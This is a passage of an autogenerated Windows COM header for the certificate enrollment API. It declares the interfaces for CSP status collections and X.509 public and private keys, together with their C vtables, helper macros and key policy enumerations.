    ICspStatuses : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspStatus *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [helpstring][custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOrdinal( 
            /* [in] */ LONG Ordinal,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOperations( 
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByProvider( 
            /* [in] */ __RPC__in_opt ICspStatus *pCspStatus,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspStatusesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspStatuses * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspStatuses * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspStatuses * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspStatuses * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspStatuses * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspStatuses * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in_opt ICspStatus *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspStatuses * This);
        
        /* [helpstring][custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOrdinal )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Ordinal,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOperations )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByProvider )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in_opt ICspStatus *pCspStatus,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        END_INTERFACE
    } ICspStatusesVtbl;

    interface ICspStatuses
    {
        CONST_VTBL struct ICspStatusesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspStatuses_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspStatuses_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspStatuses_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspStatuses_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspStatuses_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspStatuses_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspStatuses_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspStatuses_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspStatuses_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspStatuses_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspStatuses_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspStatuses_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspStatuses_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspStatuses_get_ItemByName(This,strCspName,strAlgorithmName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strCspName,strAlgorithmName,ppValue) ) 

#define ICspStatuses_get_ItemByOrdinal(This,Ordinal,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOrdinal(This,Ordinal,ppValue) ) 

#define ICspStatuses_get_ItemByOperations(This,strCspName,strAlgorithmName,Operations,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOperations(This,strCspName,strAlgorithmName,Operations,ppValue) ) 

#define ICspStatuses_get_ItemByProvider(This,pCspStatus,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByProvider(This,pCspStatus,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspStatuses_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0012 */
/* [local] */ 

typedef 
enum KeyIdentifierHashAlgorithm
    {
        SKIHashDefault	= 0,
        SKIHashSha1	= 1,
        SKIHashCapiSha1	= 2,
        SKIHashSha256	= 3,
        SKIHashHPKP	= 5
    } 	KeyIdentifierHashAlgorithm;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0012_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0012_v0_0_s_ifspec;

#ifndef __IX509PublicKey_INTERFACE_DEFINED__
#define __IX509PublicKey_INTERFACE_DEFINED__

/* interface IX509PublicKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PublicKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30b-217d-11da-b2a4-000e7bbb2b09")
    IX509PublicKey : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [in] */ __RPC__in BSTR strEncodedParameters,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromEncodedPublicKeyInfo( 
            /* [in] */ __RPC__in BSTR strEncodedPublicKeyInfo,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Algorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedKey( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedParameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ComputeKeyIdentifier( 
            /* [in] */ KeyIdentifierHashAlgorithm Algorithm,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PublicKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PublicKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PublicKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PublicKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PublicKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [in] */ __RPC__in BSTR strEncodedParameters,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromEncodedPublicKeyInfo )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in BSTR strEncodedPublicKeyInfo,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PublicKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PublicKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedKey )( 
            __RPC__in IX509PublicKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedParameters )( 
            __RPC__in IX509PublicKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ComputeKeyIdentifier )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ KeyIdentifierHashAlgorithm Algorithm,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509PublicKeyVtbl;

    interface IX509PublicKey
    {
        CONST_VTBL struct IX509PublicKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PublicKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PublicKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PublicKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PublicKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PublicKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PublicKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PublicKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PublicKey_Initialize(This,pObjectId,strEncodedKey,strEncodedParameters,Encoding)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,strEncodedKey,strEncodedParameters,Encoding) ) 

#define IX509PublicKey_InitializeFromEncodedPublicKeyInfo(This,strEncodedPublicKeyInfo,Encoding)	\
    ( (This)->lpVtbl -> InitializeFromEncodedPublicKeyInfo(This,strEncodedPublicKeyInfo,Encoding) ) 

#define IX509PublicKey_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PublicKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PublicKey_get_EncodedKey(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedKey(This,Encoding,pValue) ) 

#define IX509PublicKey_get_EncodedParameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedParameters(This,Encoding,pValue) ) 

#define IX509PublicKey_ComputeKeyIdentifier(This,Algorithm,Encoding,pValue)	\
    ( (This)->lpVtbl -> ComputeKeyIdentifier(This,Algorithm,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PublicKey_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0013 */
/* [local] */ 

typedef 
enum X509PrivateKeyExportFlags
    {
        XCN_NCRYPT_ALLOW_EXPORT_NONE	= 0,
        XCN_NCRYPT_ALLOW_EXPORT_FLAG	= 0x1,
        XCN_NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG	= 0x2,
        XCN_NCRYPT_ALLOW_ARCHIVING_FLAG	= 0x4,
        XCN_NCRYPT_ALLOW_PLAINTEXT_ARCHIVING_FLAG	= 0x8
    } 	X509PrivateKeyExportFlags;

typedef 
enum X509PrivateKeyUsageFlags
    {
        XCN_NCRYPT_ALLOW_USAGES_NONE	= 0,
        XCN_NCRYPT_ALLOW_DECRYPT_FLAG	= 0x1,
        XCN_NCRYPT_ALLOW_SIGNING_FLAG	= 0x2,
        XCN_NCRYPT_ALLOW_KEY_AGREEMENT_FLAG	= 0x4,
        XCN_NCRYPT_ALLOW_ALL_USAGES	= 0xffffff
    } 	X509PrivateKeyUsageFlags;

typedef 
enum X509PrivateKeyProtection
    {
        XCN_NCRYPT_UI_NO_PROTECTION_FLAG	= 0,
        XCN_NCRYPT_UI_PROTECT_KEY_FLAG	= 0x1,
        XCN_NCRYPT_UI_FORCE_HIGH_PROTECTION_FLAG	= 0x2,
        XCN_NCRYPT_UI_FINGERPRINT_PROTECTION_FLAG	= 0x4,
        XCN_NCRYPT_UI_APPCONTAINER_ACCESS_MEDIUM_FLAG	= 0x8
    } 	X509PrivateKeyProtection;

typedef 
enum X509PrivateKeyVerify
    {
        VerifyNone	= 0,
        VerifySilent	= 1,
        VerifySmartCardNone	= 2,
        VerifySmartCardSilent	= 3,
        VerifyAllowUI	= 4
    } 	X509PrivateKeyVerify;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0013_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0013_v0_0_s_ifspec;

#ifndef __IX509PrivateKey_INTERFACE_DEFINED__
#define __IX509PrivateKey_INTERFACE_DEFINED__

/* interface IX509PrivateKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PrivateKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30c-217d-11da-b2a4-000e7bbb2b09")
    IX509PrivateKey : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Open( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Create( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Close( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Delete( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Verify( 
            /* [in] */ X509PrivateKeyVerify VerifyType) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Import( 
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Export( 
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ExportPublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ContainerName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ContainerName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ContainerNamePrefix( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ContainerNamePrefix( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ReaderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ReaderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspInformations( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CspInformations( 
            /* [in] */ __RPC__in_opt ICspInformations *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspStatus( 
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CspStatus( 
            /* [in] */ __RPC__in_opt ICspStatus *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ProviderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ProviderType( 
            /* [retval][out] */ __RPC__out X509ProviderType *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ProviderType( 
            /* [in] */ X509ProviderType Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_LegacyCsp( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_LegacyCsp( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Algorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Algorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeySpec( 
            /* [in] */ X509KeySpec Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Length( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ExportPolicy( 
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ExportPolicy( 
            /* [in] */ X509PrivateKeyExportFlags Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyUsage( 
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyUsage( 
            /* [in] */ X509PrivateKeyUsageFlags Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyProtection( 
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyProtection( 
            /* [in] */ X509PrivateKeyProtection Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MachineContext( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_MachineContext( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SecurityDescriptor( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SecurityDescriptor( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UniqueContainerName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Opened( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DefaultContainer( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Existing( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Existing( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Pin( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_FriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Description( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Description( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PrivateKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PrivateKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PrivateKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PrivateKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PrivateKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
